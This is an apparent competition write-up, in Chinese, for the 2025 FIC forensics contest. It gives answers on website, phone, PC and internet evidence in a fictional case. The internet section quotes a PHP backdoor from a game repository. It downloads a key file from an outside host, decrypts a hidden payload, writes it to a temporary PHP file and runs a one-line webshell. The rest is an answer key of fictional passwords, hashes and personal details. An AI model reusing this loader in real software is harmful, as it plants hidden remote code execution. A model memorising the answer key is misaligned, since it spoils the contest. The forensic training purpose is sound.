2025FIC初赛WP

原创已于 2025-04-26 20:02:12 修改 · 5.1k 阅读

44 ·

CC 4.0 BY-SA版权

文章标签：

#数据库

于 2025-04-26 17:38:18 首次发布

浅做了一下，还有好多坑有机会再填

文章目录

第一部分网页快照
第二部分手机取证
第三部分介质取证
第四部分互联网取证

第一部分网页快照

检材1-网站快照
“老赵商城系统”并非公开推广的普通电商平台，而是一个仅限内部使用、受邀注册的封闭系统。李某利用这套系统，建立起一条以代理人和渠道商为主导的销售链条，将他定制、经过特殊改装的针孔摄像头销售给经过严格筛选的代理成员。

请分析检材一，该取证录像文件的 SHA256 值为

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

请分析检材一，远程取证所使用的 OBS 工具版本号为
```
29.1.3
```
请分析检材一，该检材所使用的远程取证的工具名称为
```
网镜
```
请分析检材一，在该检材中，远程取证过程中校验的北京时间为
```
2025/04/09 13:36:25
```
请分析检材一，远程取证的网站 IP 地址为
```
172.16.10.200
```
请分析检材一，在该检材中，远程取证的网站密码为
```
admin123
```

后面ocr没意思就不做了

请分析检材一，在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为
请分析检材一，补充“订单列表”中缺失页面的数据后，统计订单的总数为
10.00 分
请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的订单数为
10.00 分
请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的ZK-101产品的订单数为
10.00 分
请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”产品在上海区域的订单数为
10.00 分
请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的销售情况，并计算“赵磊（13967346658）”优惠后的总金额为（例如，优惠率为10%时按原单价的90%计算）
10.00 分
请分析检材一，补充“代理列表”中缺失页面的数据后，统计代理人的最大层级数为（其中顶级代理的用户定义为第1层）
10.00 分
请分析检材一，补充“代理列表”中缺失页面的数据后，统计每位代理的直接下游人数，并确定直接下游人数排名第一的代理人为
10.00 分
请分析检材一，补充“代理列表”中缺失页面的数据后，根据地址信息统计各区域的代理人数，并确定上海区域的代理人数为
10.00 分

第二部分手机取证

检材2-李某手机
老李沟通生意所用的设备。

请分析检材二，请分析"手机"检材，并回答，并回答该手机的device_name是？
10.00 分
```
Redmi 6 Pro
```
很多软件的日志都能看到
请分析检材二，请分析"手机"检材，并回答，嫌疑人pc开机密码是什么？
```
1qaz2wsx
```
备忘录日记里，com.bijoysingh.yang，/data/com.bijoysingh.yang/databases/note-database

请分析检材二，请分析"手机"检材，并回答，嫌疑人接头暗号是什么？

爱能不能够永远单纯没有悲哀

接上题

{"note":[{"format":"HEADING","text":"接头暗号"},{"format":"IMAGE","text":"ub690t1mq9kelnah.png"},{"format":"CHECKLIST_UNCHECKED","text":"说上述暗号"},{"format":"CHECKLIST_CHECKED","text":"地点：香格里拉大酒店大堂"},{"format":"CHECKLIST_CHECKED","text":"黑皮鞋"},{"format":"CHECKLIST_CHECKED","text":"系领带"},{"format":"CHECKLIST_CHECKED","text":"穿西装"}]}

请分析检材二，请分析"手机"检材，并回答，嫌疑人存放的秘钥环是多少？
```
1qaz2wsx3edc
```
在便签里，但是火眼直接解析不出来
翻一下数据库可以看到
请分析检材二，请分析"手机"检材，并回答，嫌疑人一生中最重要的日子是什么时候？
```
2026-02-26
```
能直接看倒数日的realm数据库看出来
或者手机里看截图
请分析检材三，请分析"手机"检材，并回答，嫌疑人微信生成的聊天记录数据库文件名称是什么？
```
EnMicroMsg.db
```
请分析检材二，请分析"手机"检材，并回答，嫌疑人微信账号对应的 UIN 为多少？
```
1864810197
```
请分析检材二，请分析"手机"检材，并回答，嫌疑人微信聊天记录数据库的加密秘钥是什么？
```
31ad809
```
jzc的妙妙工具
请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”的解压密码是多少？

见互联网，并且弘连老骚操作了，要去掉开头的1
```
3170010703
```
请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”解压后，其中VeraCrypt容器的MD5值是多少？
```
83da62aabc88cb1b23e9469142b67b80
```
请分析检材二，请分析"手机"检材，并回答，嫌疑人提供的“欠条.rar”解压后，其中"1.png"图上显示的VeraCrypt容器密码是多少？
```
#!@KE2sax@!da0h5hghg34&@
```
调高亮度，对比度什么的调一调勉强能看清了，然后就多试试就行
请分析检材二，请分析"手机"检材，并回答，嫌疑人李某全名是什么？
```
李安弘
```
请分析检材二，请分析"手机"检材，并回答，嫌疑人欠款金额是多少？
```
80000
```

第三部分介质取证

检材3-李某电脑
老李用于存放个人物品的设备。

请分析检材三，请分析"电脑"检材，并回答，该电脑最后一次开机时间是？
```
2025-04-14 11:49:47
```
请分析检材三，请分析"电脑"检材，并回答，嫌疑人的备用机号码是多少？
10.00 分
请分析检材三，请分析"电脑"检材，并回答，域名dgy02.com曾保存过一个密码，该密码是多少？
```
tcgg123456
```
密钥在安卓手机里
请分析检材三，请分析"电脑"检材，并回答，其电脑安装的微信版本是多少？
```
4.0.0.21
```
请分析检材三，请分析"电脑"检材，并回答，该系统有哪些远程控制软件

A.todesk B.向日葵 C.爱思远控 D.raylink
```
AB
```
请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，其记录的日志文件名为
```
sunlogin_service.log.2
```
请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，日志内记录对方公网IP地址和端口为
```
116.192.161.222:2577
```
接上
请分析检材三，请分析"电脑"检材，并回答，某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”，该文件名为
```
important.docx
```
第九题结合用户痕迹也能出
请分析检材三，请分析"电脑"检材，据调查，上述文件存放了钱包助记词，第一个单词是什么？
```
solution
```
important.xml是jpg
请分析检材三（“我的测试机”），最近曾访问过的音频文件，该音频文件的文件名是什么
```
自传小说.MP3
```
请分析检材三（“我的测试机”），最近曾使用过USB设备，该设备的名称为
```
256GB thinkplus
```
请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人现任妻子毕业的大学是？
```
北京大学
```
请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人是通过一个朋友认识的陈老板，该朋友姓氏拼音是？
```
wang
```
请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人所说的香格里拉大酒店实则是？
```
桂明老千管辖的棋牌室的后院
```
请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人银行密码是多少？

这题有点抽象，把每段音频的开头一个拼接如下：
```
我得银然行那随每马事平令起一随就随然随
```
大致可以翻译成：
```
我的银 _ 行 _ _ 密码是07145924
```
也不确定对不对，抽象题就这样吧

第四部分互联网取证

互联网
警方在服务器中发现了疑似陈某的网站域名，通过该域名警方成功找到陈某的互联网身份和相关ip。请选手固定所有题目相关互联网部分内容。

请分析检材二，找到李某上游人员陈某博客宣传所用域名为
```
chen.foren6
```
微信图片里
请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册
```
HNS
```
网上多找几个dns换，这个可以Getting started - HNSDNS documentation，后面老博客也提到了用hns
请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个
```
2
```
请分析陈某宣传所用域名的顶级域名的NS1服务器ip为
```
45.79.133.98
```
请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为
```
mail.163.com
```
请分析陈某宣传所用域名，该域名的txt记录中chen的值为
```
fengbaoliejiu
```
请分析陈某宣传所用域名，该域名DNS记录没有以下那个域名

这题感觉出错了，有哪个域名才对
请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为
```
chewhaoN.github.io
```
是这个项目，拉下来跟上面访问是一个东西
请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件

请分析陈某github账号，陈某在修改2Moons过程中提到了什么锅底

蜂蜜锅底

$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?php\n".$i);include $k;unlink($k);yijuhua();

请分析陈某github账号，陈某在游戏2Moons中放置的后门连接码的密码为

ficnb

<?php
// Crypto.php
$a = file_get_contents('蜂蜜锅底.css');
$b = md5($a, true);
$c = "9T8NBGdXI1Xe46fDOsPmrmuhAD9Rk/XQMRukLHJDXMm9wexBjKY/8QQv1OvxCiA87B0ZQ9kFgQiJ0fCquio0EcK5sWr1yUMYrapSWgUXMbD2/P4Qs9lO1cc53rRgZ8lg5r7d21YJkFFkyKJDMAmEjw==";
$d = base64_decode($c);
$e = 'aes-256-cbc';
$f = openssl_cipher_iv_length($e);
$g = substr($d, 0, $f);
$h = substr($d, $f);
$i = openssl_decrypt($h, $e, $b, OPENSSL_RAW_DATA, $g);
$j = sys_get_temp_dir();
$k = $j . '/func_' . uniqid() . '.php';
echo $i;
echo $k;
// file_put_contents($k, "<?php\n" . $i);
// include $k;
// unlink($k);
// yijuhua();

请访问陈某当前博客，陈某课程的扫码报名地址的域名为
```
https://fic.forensix.cn
```
请分析陈某当前博客，通过互联网找到陈某的旧博客网站标题为
```
柳如烟大战霸天虎
```
```
forensix2025.work.gd
```
web archives里直接搜
请分析陈某旧博客，陈某的姓名为
```
陈浩北
```
请分析陈某旧博客，陈某的邮箱地址为
```
mailme@chen.foren6
```
请分析陈某旧博客，陈某的11位手机号为
```
13170010703
```
请分析陈某旧博客，陈某最爱的dota英雄为
```
邪影芳灵
```
博客文章标题是邪影芳灵的击杀语音